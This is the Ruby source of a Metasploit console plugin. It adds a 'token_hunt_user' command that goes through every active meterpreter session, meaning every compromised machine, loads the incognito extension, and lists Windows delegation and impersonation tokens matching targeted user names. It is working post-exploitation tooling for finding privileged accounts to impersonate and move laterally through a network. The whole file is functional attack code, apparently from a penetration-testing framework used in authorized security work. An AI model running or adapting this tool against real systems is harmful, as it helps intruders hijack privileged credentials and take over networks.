#
# $Id$
# $Revision$
#

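module Msf

# Console plugin that registers the +token_hunt_user+ command. The command
# walks every meterpreter session known to the framework, asks the session's
# incognito extension for its token listing, and prints the entries that
# match the requested user names.
class Plugin::TokenHunter < Msf::Plugin

  # Command dispatcher that provides the +token_hunt_user+ console command.
  class TokenCommandDispatcher
    include Msf::Ui::Console::CommandDispatcher

    # Display name of this dispatcher. Plugin#cleanup removes the dispatcher
    # by this exact string, so the two must stay in sync.
    def name
      "Token Hunter"
    end

    # Maps each console command to its one-line help text.
    def commands
      {
        'token_hunt_user' => "Scan all connected meterpreter sessions for active tokens corresponding to one or more users"
      }
    end

    # Handler for +token_hunt_user+.
    #
    # Arguments:
    #   -h          print usage and return
    #   -f <file>   read additional user names from <file>, one per line;
    #               blank lines and lines starting with '#' are ignored
    #   anything else is taken as a user name, either "user" or "DOMAIN\user"
    #
    # A name containing a backslash is compared against the whole token
    # entry; a bare name is compared against the account part of the entry.
    # All comparisons ignore case and surrounding whitespace.
    def cmd_token_hunt_user(*args)
      opts = Rex::Parser::Arguments.new(
        "-h" => [ false, "This help menu"],
        "-f" => [ true,  "A file containing a list of users to search for (one per line)"]
      )

      opt_userfile = nil
      opt_users    = []

      opts.parse(args) do |opt, idx, val|
        case opt
        when "-h"
          print_line("Usage: token_hunt_user [options] <username> [username] .. [username]")
          print_line(opts.usage)
          return
        when "-f"
          opt_userfile = val
        else
          opt_users << val
        end
      end

      if opt_userfile
        begin
          opt_users.concat(read_user_file(opt_userfile))
        rescue ::SystemCallError, ::IOError => e
          # A missing or unreadable list is reported instead of raising
          # out of the command handler.
          print_error("Could not read user list #{opt_userfile}: #{e}")
          return
        end
      end

      opt_users.uniq!

      framework.sessions.each_key do |sid|
        session = framework.sessions[sid]
        next if session.type != "meterpreter"

        print_status(">> Scanning session #{session.sid} / #{session.tunnel_peer}")

        # Load the extension on demand, then re-check: a session where the
        # load did not take effect is skipped rather than queried.
        session.core.use("incognito") if not session.incognito

        if not session.incognito
          print_status("!! Failed to load incognito on #{session.sid} / #{session.tunnel_peer}")
          next
        end

        res = session.incognito.incognito_list_tokens(0)
        next if not res

        report_matches(session, res["delegation"],    opt_users, "FOUND: ",   "delegation")
        report_matches(session, res["impersonation"], opt_users, ">> Found ", "impersonation")
      end
    end

    private

    # Reads user names from +path+, one per line, skipping blank lines and
    # lines whose first non-blank character is '#'. Returns an Array of
    # Strings; file errors propagate to the caller.
    def read_user_file(path)
      users = []
      ::File.open(path, "rb") do |fd|
        fd.each_line do |line|
          line.strip!
          next if line.empty?
          next if line =~ /\A#/
          users << line
        end
      end
      users
    end

    # Prints one status line for every (token entry, requested user) pair
    # that matches.
    #
    # session - the session the listing came from (used for sid/tunnel_peer)
    # listing - newline-separated token entries as returned under the
    #           "delegation" / "impersonation" keys
    # users   - requested names, "user" or "DOMAIN\user"
    # prefix  - text printed before the session id
    # kind    - label printed in parentheses after the entry
    def report_matches(session, listing, users, prefix, kind)
      listing.to_s.split("\n").each do |user|
        entry = user.strip.downcase
        next if entry.empty?

        # Account part of the entry. An entry without a backslash has no
        # second field; treat the whole entry as the account name, the same
        # way a bare requested name is handled, instead of calling strip
        # on nil.
        parts   = entry.split("\\")
        account = (parts[1] || parts[0]).to_s.strip

        users.each do |needle|
          wanted = needle.to_s.strip.downcase
          next if wanted.empty?

          ndom, nusr = wanted.split("\\")
          hit = if nusr
            entry == wanted            # DOMAIN\user: compare the full entry
          else
            account == ndom.to_s.strip # bare name: compare the account part
          end

          next if not hit
          print_status("#{prefix}#{session.sid} - #{session.tunnel_peer} - #{user} (#{kind})")
        end
      end
    end
  end

  # Registers the command dispatcher with the console when the plugin loads.
  def initialize(framework, opts)
    super
    add_console_dispatcher(TokenCommandDispatcher)
  end

  # Unregisters the dispatcher; the string must equal
  # TokenCommandDispatcher#name.
  def cleanup
    remove_console_dispatcher('Token Hunter')
  end

  # Short plugin identifier.
  def name
    "token_hunter"
  end

  # One-line plugin description.
  def desc
    "Search all active meterpreter sessions for specific tokens"
  end
end
end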